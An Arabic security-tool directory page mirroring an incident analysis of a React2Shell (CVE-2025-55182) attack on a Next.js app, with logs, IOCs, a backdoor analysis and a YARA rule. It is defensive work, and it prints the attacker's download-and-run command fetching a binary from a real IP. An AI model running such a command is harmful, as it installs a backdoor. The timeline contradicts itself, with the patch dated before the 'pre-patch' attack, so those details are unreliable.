Skip to content
KitploitKITPLOIT
أدواتالمدونة
Log in
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-55182-Attack-Analysis — تحليل هجوم واقعي لـ CVE-2025-55182 (React2Shell) - ثغرة RCE في مكونات خادم React | Kitploit
أدوات/GitHubGitHub/ngvcanh/cve-2025-55182-attack-analysis
إدارة مؤشرات الاختراق (IOC)تحليل الثغرات الأمنيةالتحقيق الجنائي الرقميأمن الويبتحليل البرمجيات الخبيثةاستخبارات التهديداتالتعلم والتعليمالاستجابة للحوادث

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHub
ngvcanh/cve-2025-55182-attack-analysis

CVE-2025-55182-Attack-Analysis

تحليل هجوم واقعي لـ CVE-2025-55182 (React2Shell) - ثغرة RCE في مكونات خادم React

عرض المستودع
16منذ 9 أشهرلم تتم المراجعة بعد

تحليل هجوم CVE-2025-55182: تنفيذ التعليمات البرمجية عن بُعد في مكونات React Server Components

تحليل هجوم واقعي على تطبيق Next.js إنتاجي

📋 جدول المحتويات

  • الملخص التنفيذي
  • نظرة عامة على الثغرة
  • الجدول الزمني للهجوم
  • التحليل الفني
  • تحليل البرمجيات الخبيثة
  • مؤشرات الاختراق (IOCs)
  • التخفيف والاستجابة
  • الدروس المستفادة
  • المراجع

الملخص التنفيذي

في 5 ديسمبر 2025، استهدف المهاجمون تطبيق Next.js الإنتاجي الخاص بنا مستغلين CVE-2025-55182 (React2Shell)، وهي ثغرة حرجة لتنفيذ التعليمات البرمجية عن بُعد في مكونات React Server Components. حاول الهجوم تنزيل وتنفيذ حصان طروادة (باب خلفي) على خادمنا لنظام Linux.

السمةالقيمة
معرف CVECVE-2025-55182
درجة CVSS9.8 (حرجة)
تاريخ الهجوم5 ديسمبر 2025
نتيجة الهجوم✅ تم الحظر (بعد التصحيح)
نوع البرمجية الخبيثةحصان طروادة باب خلفي لأنظمة Linux
المكدس المتأثرNext.js + React Server Components

نظرة عامة على الثغرة

ما هي CVE-2025-55182؟

CVE-2025-55182، المعروفة أيضًا باسم "React2Shell"، هي ثغرة حرجة لتنفيذ التعليمات البرمجية عن بُعد (RCE) تؤثر على مكونات React Server Components (RSC) في:

  • React: الإصدارات 19.0.0 - 19.2.1
  • Next.js: الإصدارات 15.x و 16.x (قبل التصحيحات)

السبب الجذري

توجد الثغرة في دالة renderToReadableStream() داخل Flight Server الخاص بـ React. عند معالجة حمولات RSC مصممة خصيصًا، يفشل الخادم في تعقيم بعض المدخلات بشكل صحيح، مما يؤدي إلى تنفيذ تعليمات برمجية عشوائية.

ناقل الهجوم

Attacker → Malicious RSC Payload → Flight Server → eval() → RCE

يرسل المهاجم طلب POST معدًا مع حمولة متسلسلة ضارة يتم إلغاء تسلسلها وتنفيذها على الخادم.


الجدول الزمني للهجوم

المرحلة 1: محاولات الاستغلال الأولية (قبل التصحيح)

الطابع الزمني (UTC)الحدث
5 ديسمبر، 06:20اكتشاف أول هجوم عبر Sentry
5 ديسمبر، 06:20محاولة الحمولة تنفيذ أوامر الصدفة
5 ديسمبر، 06:20الهجوم ناجح جزئيًا (قبل التصحيح)

سجل خطأ Sentry (قبل التصحيح):

Error: root
  at eval (eval at <anonymous>, <anonymous>:3:6)
  at nk (chunk.js)
  at JSON.parse (<anonymous>)
  at n5 (/app/node_modules/next/dist/server/app-render.js)

المرحلة 2: نشر التصحيح

الطابع الزمنيالإجراء
4 ديسمبر، 14:13الترقية إلى Next.js 16.0.7
4 ديسمبر، 14:13نشر الإصدار المصحح (v1.0.0-beta-4)

المرحلة 3: حظر الهجوم بعد التصحيح

الطابع الزمني (UTC)الحدث
5 ديسمبر، 08:48اكتشاف محاولة الهجوم
5 ديسمبر، 08:48تم حظر تنفيذ الحمولة
5 ديسمبر، 08:48خطأ: syntax error: unexpected ";"

سجل خطأ Sentry (بعد التصحيح):

Error: Command failed: wget http://45.76.155.14/vim -O /tmp/vim ; 
chmod +x /tmp/vim ; nohup /tmp/vim > /dev/null 2>&1 & ; rm -f /tmp/vim
/bin/sh: syntax error: unexpected ";"

نجح التصحيح في منع تنفيذ الأمر الضار.


التحليل الفني

تفاصيل طلب الهجوم

السمةالقيمة
URL الهدفhttps://[REDACTED]/
الطريقةPOST
وكيل المستخدمPython Requests 2.31
المصدرنص هجوم آلي

تحليل الحمولة

حاول المهاجم تنفيذ سلسلة الأوامر التالية:

wget http://45.76.155.14/vim -O /tmp/vim ; \
chmod +x /tmp/vim ; \
nohup /tmp/vim > /dev/null 2>&1 & ; \
rm -f /tmp/vim

تفصيل:

الخطوةالأمرالغرض
1wget http://45.76.155.14/vim -O /tmp/vimتنزيل البرمجية الخبيثة
2chmod +x /tmp/vimجعل الملف قابلًا للتنفيذ
3nohup /tmp/vim > /dev/null 2>&1 &التشغيل في الخلفية، الاستمرار بعد تسجيل الخروج
4rm -f /tmp/vimحذف الأدلة

بيئة الخادم

المكونالإصدار
نظام التشغيلAlpine Linux 3.23.0
بيئة التشغيلNode.js v20.19.6
الإطارNext.js 16.0.7 (مصحح)
الحاويةDocker

تحليل البرمجيات الخبيثة

معلومات الملف

السمةالقيمة
اسم الملفvim (متنكر كأداة شرعية)
SHA2560f0f9c339fcc267ec3d560c7168c56f607232cbeb158cb02a0818720a54e72ce
نوع الملفELF 64-bit LSB قابل للتنفيذ، x86-64
اللغةGo (ملف ثنائي مجمّع)
حجم الملف~4.7 MB

نتائج VirusTotal

معدل الكشف: 13/72 (18%)

البائعاسم الكشف
DrWebLinux.BackDoor.Siggen.389
AhnLab-V3Backdoor/Linux.Agent.4780032
KasperskyHEUR:Trojan.Linux.Agent.gen
ESET-NOD32Linux/Agent.PX Trojan
Avast/AVGELF:Agent-BQE [Trj]
AliCloudTrojan:Linux/Agent.ff565f70
Antiy-AVLTrojan/Linux.Agent.px
RisingTrojan.Agent/Linux!8.13268
SentinelOneStatic AI - Suspicious ELF
TencentMalware.Linux.Generic.1c03c8b9
ZillyaTrojan.Agent.Linux.5292

رابط VirusTotal: عرض التحليل

تحليل الملف الثنائي

رأس ELF:

00000000: 7f45 4c46 0201 0100 0000 0000 0000 0000  .ELF............
00000010: 0200 3e00 0100 0000 60e7 4500 0000 0000  ..>.....`.E.....

الإمكانيات المحددة:

الإمكانيةالدليل
عميل HTTP/HTTPSnet/http, *http.Client
تشفير TLScrypto/tls, crypto/aes
وكيل SOCKS5socks, socks5
حل DNSnet/dns/dnsmessage
تشفير قويchacha20poly1305, Ed25519

السلاسل المستخرجة (ذات الصلة):

crypto/aes
crypto/tls
net/http
socks5
vendor/golang.org/x/crypto/chacha20poly1305
vendor/golang.org/x/net/http2/hpack

قواعد IDS التي تم تفعيلها

الخطورةالقاعدةالمصدر
منخفضةET POLICY HTTP traffic on port 443 (POST)Proofpoint ET Open
منخفضةET DNS Query for .cc TLDProofpoint ET Open

تصنيف البرمجية الخبيثة

النوع: حصان طروادة باب خلفي لأنظمة Linux

الإمكانيات:

  • الوصول إلى الصدفة عن بُعد
  • الاتصال بالخادم والتحكم (C2)
  • تحميل/تنزيل الملفات
  • الاتصالات المشفرة
  • تمرير حركة المرور عبر SOCKS5
  • آليات الثبات

مؤشرات الاختراق (IOCs)

مؤشرات الشبكة

النوعالقيمةالوصف
عنوان IP45.76.155.14خادم توزيع البرمجية الخبيثة
URLhttp://45.76.155.14/vimرابط تنزيل البرمجية الخبيثة
الاستضافةVultr VPSمزود السحابة
النطاق الأعلى.ccنطاق C2 يستخدم .cc

مؤشرات الملفات

النوعالقيمة
SHA2560f0f9c339fcc267ec3d560c7168c56f607232cbeb158cb02a0818720a54e72ce
SHA1[احسب إذا لزم الأمر]
MD5[احسب إذا لزم الأمر]
اسم الملفvim (متنكر)
نوع الملفELF 64-bit x86-64
حجم الملف~4.7 MB

مؤشرات سلوكية

المؤشرالوصف
wget إلى IP خارجيتنزيل من عناوين URL غير قياسية
ملفات في /tmp/ملف قابل للتنفيذ مشبوه في الدليل المؤقت
nohup + تشغيل في الخلفيةمحاولة ثبات
حذف الملف فورًاتنظيف الأدلة
وكيل المستخدم Python Requestsأداة هجوم آلية

قاعدة YARA

rule CVE_2025_55182_Backdoor {
    meta:
        description = "يكتشف الباب الخلفي الموزع عبر CVE-2025-55182"
        author = "باحث أمني"
        date = "2025-12-05"
        hash = "0f0f9c339fcc267ec3d560c7168c56f607232cbeb158cb02a0818720a54e72ce"
    
    strings:
        $elf = { 7F 45 4C 46 }
        $go1 = "vendor/golang.org/x/crypto" ascii
        $go2 = "vendor/golang.org/x/net" ascii
        $net1 = "net/http" ascii
        $net2 = "socks5" ascii
        $crypto1 = "crypto/tls" ascii
        $crypto2 = "chacha20poly1305" ascii
    
    condition:
        $elf at 0 and
        (2 of ($go*)) and
        (1 of ($net*)) and
        (1 of ($crypto*))
}

التخفيف والاستجابة

الإجراءات الفورية المتخذة

تنزيل الأداة